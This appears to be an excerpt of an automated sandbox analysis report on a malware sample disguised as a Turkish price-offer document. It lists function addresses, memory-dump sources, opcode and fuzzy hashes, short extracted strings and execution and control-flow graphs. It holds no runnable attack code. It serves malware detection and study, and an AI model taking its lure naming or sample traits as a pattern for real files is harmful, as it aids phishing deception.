                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b08eda79d334fbc2145f262bfff9e5a738a56632c3a06f3ed80e3b98a22780c2
                                                                                                      • Instruction ID: 5b866d3b98bb3bf3e7e0cfca800831402d304b40aea44682bed4ec543fc68ccc
                                                                                                      • Opcode Fuzzy Hash: b08eda79d334fbc2145f262bfff9e5a738a56632c3a06f3ed80e3b98a22780c2
                                                                                                      • Instruction Fuzzy Hash: 13C04C32A26C3843D340177D75057996B66E74EA55F068453F90486326DF2898064384
                                                                                                      Function 05DD6B00 Relevance: .0, Instructions: 11COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ebebf5369e838062fc2fcbbeeb8f90e0f956a56dfd34ca7c172296d28f84cffe
                                                                                                      • Instruction ID: 8b68d6b86d5d311026650784890d2889fd3aa89a453e51802ecc26f899fe55c0
                                                                                                      • Opcode Fuzzy Hash: ebebf5369e838062fc2fcbbeeb8f90e0f956a56dfd34ca7c172296d28f84cffe
                                                                                                      • Instruction Fuzzy Hash: E7C08C3203811C8FD3008B9CE805F4473A8EB0D738F258391F1088B3B3DB31E8008640
                                                                                                      Function 05DD97C8 Relevance: .0, Instructions: 9COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0250491292d19b42419672d4c6b9a4d39ad821440ed43783fad53d0cac801931
                                                                                                      • Instruction ID: 6052a8e5bd2bd120076ee2b5a29d98771bd9a2757b425241192022804af6cfc7
                                                                                                      • Opcode Fuzzy Hash: 0250491292d19b42419672d4c6b9a4d39ad821440ed43783fad53d0cac801931
                                                                                                      • Instruction Fuzzy Hash: 06C04870260A5887FE066B64A61A789BB29F789710F20C824FB5589193CEAC66068705
                                                                                                      Function 05DDC128 Relevance: .0, Instructions: 8COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b8670932ff60962f8d15513e56492dd8f86d8d83c5c5bc57ffe0bb1536619c34
                                                                                                      • Instruction ID: 7c369f0acbb1fc5a26b8edc23a4a3921890b9a70d9aa0ecf33d912ca0ba6004d
                                                                                                      • Opcode Fuzzy Hash: b8670932ff60962f8d15513e56492dd8f86d8d83c5c5bc57ffe0bb1536619c34
                                                                                                      • Instruction Fuzzy Hash: 57B012356B5B70A26200F3F44DD9F5ED211EFB5700F90AC13B24900020846D9C25E13B
                                                                                                      Function 05DD6B10 Relevance: .0, Instructions: 7COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                                                                      • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                                                                                                      • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                                                                      • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                                                                                                      Function 05DDB729 Relevance: .0, Instructions: 7COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c9f188855a2507eb3e75cacd1b39181df7da545c4d30eaeb14922bc212c832bb
                                                                                                      • Instruction ID: 2fc3c38be5b513a6944869a6b92991115455a0c2b3738e8e4b068153f64f1ff4
                                                                                                      • Opcode Fuzzy Hash: c9f188855a2507eb3e75cacd1b39181df7da545c4d30eaeb14922bc212c832bb
                                                                                                      • Instruction Fuzzy Hash: 80B012A4E207114BC3402F7CE08B3057E62F7C92527C00064BF01C2205DF3C18424600
                                                                                                      Function 05DDCA1F Relevance: .0, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0bf08dd845b8806be51b779a8097c5c7ed24bae238f11357fc07971f6828dc91
                                                                                                      • Instruction ID: 8383e939f99603d09eb98ce9fa1ba772e4d393066d37b67e04eb44460cd92d23
                                                                                                      • Opcode Fuzzy Hash: 0bf08dd845b8806be51b779a8097c5c7ed24bae238f11357fc07971f6828dc91
                                                                                                      • Instruction Fuzzy Hash: 3790026637199151310472A08806A159510D7F1708B548113171960154C9519465C036

                                                                                                      Non-executed Functions

                                                                                                      Function 075A4200 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %
                                                                                                      • API String ID: 0-2567322570
                                                                                                      • Opcode ID: 5b687006201b375ea6811be0f41b684ac6fef3a6e6b6fbceb8b556c702f5f1e0
                                                                                                      • Instruction ID: 13bd0b23ba60b5e51e5ea7e51cc42299695212a8967f87b840fc0e13e8d9961b
                                                                                                      • Opcode Fuzzy Hash: 5b687006201b375ea6811be0f41b684ac6fef3a6e6b6fbceb8b556c702f5f1e0
                                                                                                      • Instruction Fuzzy Hash: CE025D74A00306DFDB14DFA9D858AAEBBB6FF88300F54856AE5069B391DB319846CF50
                                                                                                      Function 07B75510 Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: >!mV
                                                                                                      • API String ID: 0-1516543346
                                                                                                      • Opcode ID: 585304512d99395877883ab222a5e0f93731ebcedc6b7bf104f0fa7029f83ee8
                                                                                                      • Instruction ID: dd87512b2edf7da072cb82f95a6bb11b29f2c05d138d62ca4d6aa68caeff6963
                                                                                                      • Opcode Fuzzy Hash: 585304512d99395877883ab222a5e0f93731ebcedc6b7bf104f0fa7029f83ee8
                                                                                                      • Instruction Fuzzy Hash: DBE1D7B4E102198FDB24CFA9C590AAEBBB2FF89305F248169D815AB355D731AD41CF60
                                                                                                      Function 075A6AF0 Relevance: 1.3, Instructions: 1269COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3069fc5fd2b930867c4ed2ac24a04ee1388faeaa01a3b256ed0f100104760fa0
                                                                                                      • Instruction ID: 79d9680d0d9f9ccd9b76d500fb03eb69e5bdc44036f239ffcd20d21643ddd98c
                                                                                                      • Opcode Fuzzy Hash: 3069fc5fd2b930867c4ed2ac24a04ee1388faeaa01a3b256ed0f100104760fa0
                                                                                                      • Instruction Fuzzy Hash: 63C2F774A01219DFDB25DF64C894AEDBBB2FF89301F1485AAE9099B350DB319D82CF50
                                                                                                      Function 075AE3D0 Relevance: .5, Instructions: 476COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1314013404.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_75a0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dd4e8024c8b921193d28e40ba3b89552ca7355175630377503f53689c3ab51b7
                                                                                                      • Instruction ID: 81c20722e8bc1cf387c4f7e8cd9d8c095228d462c0aa6caf5830d508e38feb65
                                                                                                      • Opcode Fuzzy Hash: dd4e8024c8b921193d28e40ba3b89552ca7355175630377503f53689c3ab51b7
                                                                                                      • Instruction Fuzzy Hash: FF2249B0A00219DFDB14DF68D885AADBBB2FF89301F1081AAE8099B351DB31DD85CF51
                                                                                                      Function 07B7C130 Relevance: .3, Instructions: 336COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a58524e4f0cd2aaeda7f5f9bbd8226f6fca8fd83e6d84dbdf03a3a2577576c3f
                                                                                                      • Instruction ID: 7c1e945727a628679d8a81370ceb62c5832f6e5f0778e31f6880e4bb17c6e7d2
                                                                                                      • Opcode Fuzzy Hash: a58524e4f0cd2aaeda7f5f9bbd8226f6fca8fd83e6d84dbdf03a3a2577576c3f
                                                                                                      • Instruction Fuzzy Hash: 1CC1CAF17016028FEB29DB75D464B6FB7FAAF89600F1448ADD05A9B290DF34E801CB61
                                                                                                      Function 07B74CB0 Relevance: .3, Instructions: 312COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4274f28f16054868d32121aad498c2e34e2de282b5c6bc919cecd962f425cb15
                                                                                                      • Instruction ID: db41480dad12021d3d2ec813f7f837eed16f0282a9ec3bad5400c4256605fd4b
                                                                                                      • Opcode Fuzzy Hash: 4274f28f16054868d32121aad498c2e34e2de282b5c6bc919cecd962f425cb15
                                                                                                      • Instruction Fuzzy Hash: 01E1F8B4E102598FDB14CFA8C590AAEFBB2FF89305F248169D815AB355D731AD41CFA0
                                                                                                      Function 07B774A0 Relevance: .3, Instructions: 312COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f22fecdedba544ef9e5b9c19fabf4894b482fb3a9d4f51680a4bf214fd783cd9
                                                                                                      • Instruction ID: 85378a0d1be37d4d10e5a5bcf0a5a2e174080ba6bcb25827e91442dbd377e9bc
                                                                                                      • Opcode Fuzzy Hash: f22fecdedba544ef9e5b9c19fabf4894b482fb3a9d4f51680a4bf214fd783cd9
                                                                                                      • Instruction Fuzzy Hash: B7E1F9B4E002198FDB14CF99C594AAEBBB2FF89305F24C169D815AB355DB31AD41CFA0
                                                                                                      Function 07B75958 Relevance: .3, Instructions: 312COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f54deb75a2c9aba8d08728b7fd7d20e990b7b78aa40dde2b8debaeb30666f124
                                                                                                      • Instruction ID: 3cc3415312d12c0a6d685770c0a5be96fd0ca421f9171bb06011dbaa0140c156
                                                                                                      • Opcode Fuzzy Hash: f54deb75a2c9aba8d08728b7fd7d20e990b7b78aa40dde2b8debaeb30666f124
                                                                                                      • Instruction Fuzzy Hash: ACE1FBB4E002198FDB24CFA9C590AAEFBB2FF89305F248169D415AB355D731AD41CFA0
                                                                                                      Function 07B750E8 Relevance: .3, Instructions: 312COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1315240069.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_7b70000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 98e4ab847479a7ca229b983eebdd30155abf9117489170712c685846a2c4fb89
                                                                                                      • Instruction ID: b586960ff514a1004a8ef1253a6ba736b69d15778b44bf6f9ef6dd9f55630c23
                                                                                                      • Opcode Fuzzy Hash: 98e4ab847479a7ca229b983eebdd30155abf9117489170712c685846a2c4fb89
                                                                                                      • Instruction Fuzzy Hash: 2FE1F9B4E10219CFDB24CFA8C590AAEBBB2FF49305F248169D815AB355D731AD41CFA0
                                                                                                      Function 0179E504 Relevance: .3, Instructions: 264COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1310019480.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_1790000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fc602d67f52d39eaaebf70e5d230c629b343dc6e85b5e508fbf59cceca84c3a5
                                                                                                      • Instruction ID: b69a8f0d64ea66a1d233ba15e075fa98954c86d90c49baed6ce01b130e1b1fd1
                                                                                                      • Opcode Fuzzy Hash: fc602d67f52d39eaaebf70e5d230c629b343dc6e85b5e508fbf59cceca84c3a5
                                                                                                      • Instruction Fuzzy Hash: 27A18136E00206CFCF15DFB4D85459EFBB2FF85300B25856AE905AB265EB31D95ACB80
                                                                                                      Function 05DDB8B8 Relevance: 6.5, Strings: 5, Instructions: 279COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LRq$LRq$$q$$q$$q
                                                                                                      • API String ID: 0-947498194
                                                                                                      • Opcode ID: ae029b010de7fb948d7145dddf7870445ddac880fc7585ee65ca36fc93b10752
                                                                                                      • Instruction ID: dc53fdc280d4ceedbed00644556869092418b5f43e1effa7f4333c4ac2596892
                                                                                                      • Opcode Fuzzy Hash: ae029b010de7fb948d7145dddf7870445ddac880fc7585ee65ca36fc93b10752
                                                                                                      • Instruction Fuzzy Hash: 17C13970E04218DFDB14CBA9C880AADBBB2FF88315F168157E446AB255DB34ED41CFA5
                                                                                                      Function 05DDAE90 Relevance: 5.1, Strings: 4, Instructions: 108COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.1313837255.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5dd0000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LRq$Z$$q$$q
                                                                                                      • API String ID: 0-373122597
                                                                                                      • Opcode ID: d23dae78811a21a0b1235b6186e620823fd1baf991e67f9b6ba13ca3edee1e63
                                                                                                      • Instruction ID: 1224b4112bb1db0f91393b4b3a9b09b034f30ed8394a8727c1b0a06d53ad0461
                                                                                                      • Opcode Fuzzy Hash: d23dae78811a21a0b1235b6186e620823fd1baf991e67f9b6ba13ca3edee1e63
                                                                                                      • Instruction Fuzzy Hash: 9D418CB1A04204CBDB20CF69DD44ABAF7F2FB41305F06C567E5A59B291D339E980CB66

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:13.7%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:22.4%
                                                                                                      Total number of Nodes:76
                                                                                                      Total number of Limit Nodes:8
                                                                                                      execution_graph 28245 51bc8a3 28246 51bc767 28245->28246 28247 51bc85a KiUserExceptionDispatcher 28246->28247 28248 51bc84b 28246->28248 28247->28248 28249 2a1e018 28250 2a1e024 28249->28250 28263 51b2968 28250->28263 28269 51b295b 28250->28269 28251 2a1e0c3 28276 51bddff 28251->28276 28282 51bde00 28251->28282 28252 2a1e0e6 28288 5777b78 28252->28288 28294 5777b69 28252->28294 28253 2a1e1d4 28300 51bfc68 28253->28300 28306 51bfc5f 28253->28306 28254 2a1e61f 28264 51b298a 28263->28264 28265 51b2a56 28264->28265 28312 51b9548 28264->28312 28318 51b992c 28264->28318 28324 51b9328 28264->28324 28265->28251 28270 51b2928 28269->28270 28271 51b2962 28269->28271 28272 51b2a56 28271->28272 28273 51b9548 2 API calls 28271->28273 28274 51b9328 LdrInitializeThunk 28271->28274 28275 51b992c 2 API calls 28271->28275 28272->28251 28273->28272 28274->28272 28275->28272 28278 51bde22 28276->28278 28277 51be201 28277->28252 28278->28277 28279 51b9548 2 API calls 28278->28279 28281 51bdeec 28279->28281 28280 51bc708 KiUserExceptionDispatcher 28280->28281 28281->28277 28281->28280 28284 51bde22 28282->28284 28283 51be201 28283->28252 28284->28283 28285 51b9548 2 API calls 28284->28285 28287 51bdeec 28285->28287 28286 51bc708 KiUserExceptionDispatcher 28286->28287 28287->28283 28287->28286 28289 5777b9a 28288->28289 28290 5777cac 28289->28290 28291 51b9548 2 API calls 28289->28291 28292 51b9328 LdrInitializeThunk 28289->28292 28293 51b992c 2 API calls 28289->28293 28290->28253 28291->28290 28292->28290 28293->28290 28295 5777b70 28294->28295 28296 5777cac 28295->28296 28297 51b9548 2 API calls 28295->28297 28298 51b9328 LdrInitializeThunk 28295->28298 28299 51b992c 2 API calls 28295->28299 28296->28253 28297->28296 28298->28296 28299->28296 28302 51bfc8a 28300->28302 28301 51bff20 28301->28254 28302->28301 28303 51b9548 2 API calls 28302->28303 28305 51bfd3a 28303->28305 28304 51bc708 KiUserExceptionDispatcher 28304->28305 28305->28301 28305->28304 28308 51bfc8a 28306->28308 28307 51bff20 28307->28254 28308->28307 28309 51b9548 2 API calls 28308->28309 28311 51bfd3a 28309->28311 28310 51bc708 KiUserExceptionDispatcher 28310->28311 28311->28307 28311->28310 28317 51b9579 28312->28317 28313 51b96d9 28313->28265 28314 51b9924 LdrInitializeThunk 28314->28313 28316 51b9328 LdrInitializeThunk 28316->28317 28317->28313 28317->28314 28317->28316 28322 51b97e3 28318->28322 28319 51b9924 LdrInitializeThunk 28321 51b9a81 28319->28321 28321->28265 28322->28319 28323 51b9328 LdrInitializeThunk 28322->28323 28323->28322 28325 51b933f 28324->28325 28326 51b933a 28324->28326 28325->28326 28327 51b9a69 LdrInitializeThunk 28325->28327 28326->28265 28327->28326 28328 51b9c70 28329 51b9c9d 28328->28329 28330 51b9328 LdrInitializeThunk 28329->28330 28331 51bbb7f 28329->28331 28333 51b9fa6 28329->28333 28330->28333 28332 51b9328 LdrInitializeThunk 28332->28333 28333->28331 28333->28332

                                                                                                      Executed Functions

                                                                                                      Function 02A16FC8 Relevance: 6.7, Strings: 5, Instructions: 463COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 146 2a16fc8-2a16ffe 147 2a17006-2a1700c 146->147 282 2a17000 call 2a169a0 146->282 283 2a17000 call 2a16fc8 146->283 284 2a17000 call 2a17118 146->284 148 2a1705c-2a17060 147->148 149 2a1700e-2a17012 147->149 150 2a17062-2a17071 148->150 151 2a17077-2a1708b 148->151 152 2a17021-2a17028 149->152 153 2a17014-2a17019 149->153 154 2a17073-2a17075 150->154 155 2a1709d-2a170a7 150->155 156 2a17093-2a1709a 151->156 279 2a1708d call 2a19dd0 151->279 280 2a1708d call 2a1a088 151->280 281 2a1708d call 2a1a0e8 151->281 157 2a170fe-2a1713b 152->157 158 2a1702e-2a17035 152->158 153->152 154->156 159 2a170b1-2a170b5 155->159 160 2a170a9-2a170af 155->160 167 2a17146-2a17166 157->167 168 2a1713d-2a17143 157->168 158->148 161 2a17037-2a1703b 158->161 162 2a170bd-2a170f7 159->162 164 2a170b7 159->164 160->162 165 2a1704a-2a17051 161->165 166 2a1703d-2a17042 161->166 162->157 164->162 165->157 169 2a17057-2a1705a 165->169 166->165 174 2a17168 167->174 175 2a1716d-2a17174 167->175 168->167 169->156 177 2a174fc-2a17505 174->177 178 2a17176-2a17181 175->178 179 2a17187-2a1719a 178->179 180 2a1750d-2a17519 178->180 185 2a171b0-2a171cb 179->185 186 2a1719c-2a171aa 179->186 187 2a1751b-2a17521 180->187 188 2a174bc-2a174c0 180->188 200 2a171cd-2a171d3 185->200 201 2a171ef-2a171f2 185->201 186->185 199 2a17484-2a1748b 186->199 191 2a17523-2a17549 187->191 192 2a174c4 187->192 189 2a174e2-2a174e4 188->189 190 2a174c2 188->190 193 2a174e6-2a174e9 189->193 194 2a17508 189->194 190->192 209 2a17552-2a17556 191->209 210 2a1754b-2a17550 191->210 196 2a174d3-2a174d9 192->196 197 2a174c6-2a174cb 192->197 204 2a174f0-2a174f3 193->204 194->180 196->180 203 2a174db-2a174e0 196->203 197->196 199->177 211 2a1748d-2a1748f 199->211 207 2a171d5 200->207 208 2a171dc-2a171df 200->208 205 2a171f8-2a171fb 201->205 206 2a1734c-2a17352 201->206 203->189 212 2a174b6-2a174b9 203->212 204->194 217 2a174f5-2a174fa 204->217 205->206 220 2a17201-2a17207 205->220 218 2a17358-2a1735d 206->218 219 2a1743e-2a17441 206->219 207->206 207->208 214 2a17212-2a17218 207->214 207->219 213 2a171e1-2a171e4 208->213 208->214 222 2a1755c-2a1755d 209->222 210->222 215 2a17491-2a17496 211->215 216 2a1749e-2a174a4 211->216 212->194 221 2a174bb 212->221 223 2a171ea 213->223 224 2a1727e-2a17284 213->224 227 2a1721a-2a1721c 214->227 228 2a1721e-2a17220 214->228 215->216 216->180 225 2a174a6-2a174ab 216->225 217->177 217->211 218->219 219->194 229 2a17447-2a1744d 219->229 220->206 226 2a1720d 220->226 221->188 223->219 224->219 231 2a1728a-2a17290 224->231 225->204 230 2a174ad-2a174b2 225->230 226->219 232 2a1722a-2a17233 227->232 228->232 233 2a17472-2a17476 229->233 234 2a1744f-2a17457 229->234 230->194 235 2a174b4 230->235 236 2a17292-2a17294 231->236 237 2a17296-2a17298 231->237 239 2a17235-2a17240 232->239 240 2a17246-2a1726e 232->240 233->199 241 2a17478-2a1747e 233->241 234->180 238 2a1745d-2a1746c 234->238 235->221 242 2a172a2-2a172b9 236->242 237->242 238->185 238->233 239->219 239->240 253 2a17362-2a17398 240->253 254 2a17274-2a17279 240->254 241->178 241->199 248 2a172e4-2a1730b 242->248 249 2a172bb-2a172d4 242->249 248->194 259 2a17311-2a17314 248->259 249->253 257 2a172da-2a172df 249->257 260 2a173a5-2a173ad 253->260 261 2a1739a-2a1739e 253->261 254->253 257->253 259->194 262 2a1731a-2a17343 259->262 260->194 265 2a173b3-2a173b8 260->265 263 2a173a0-2a173a3 261->263 264 2a173bd-2a173c1 261->264 262->253 277 2a17345-2a1734a 262->277 263->260 263->264 266 2a173e0-2a173e4 264->266 267 2a173c3-2a173c9 264->267 265->219 269 2a173e6-2a173ec 266->269 270 2a173ee-2a1740d call 2a176f1 266->270 267->266 271 2a173cb-2a173d3 267->271 269->270 272 2a17413-2a17417 269->272 270->272 271->194 273 2a173d9-2a173de 271->273 272->219 275 2a17419-2a17435 272->275 273->219 275->219 277->253 279->156 280->156 281->156 282->147 283->147 284->147
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2528602852.0000000002A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_2a10000_fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (oq$(oq$(oq$,q$,q
                                                                                                      • API String ID: 0-189141485
                                                                                                      • Opcode ID: c7f98badd19587237f792c30404d48da676e7076d93c0a25ffd10bf63570ec1d
                                                                                                      • Instruction ID: af5b4f4c596528706b13e155cdc8fef76fe2576c61cd35fa31648d0c79bdcd2b
                                                                                                      • Opcode Fuzzy Hash: c7f98badd19587237f792c30404d48da676e7076d93c0a25ffd10bf63570ec1d
                                                                                                      • Instruction Fuzzy Hash: 38124B30A00219DFCB15CF69DD84AAEFBF2BF89324F159469E815AB265DB30DD41CB50
                                                                                                      Function 02A1A088 Relevance: 3.4, Strings: 2, Instructions: 898COMMON
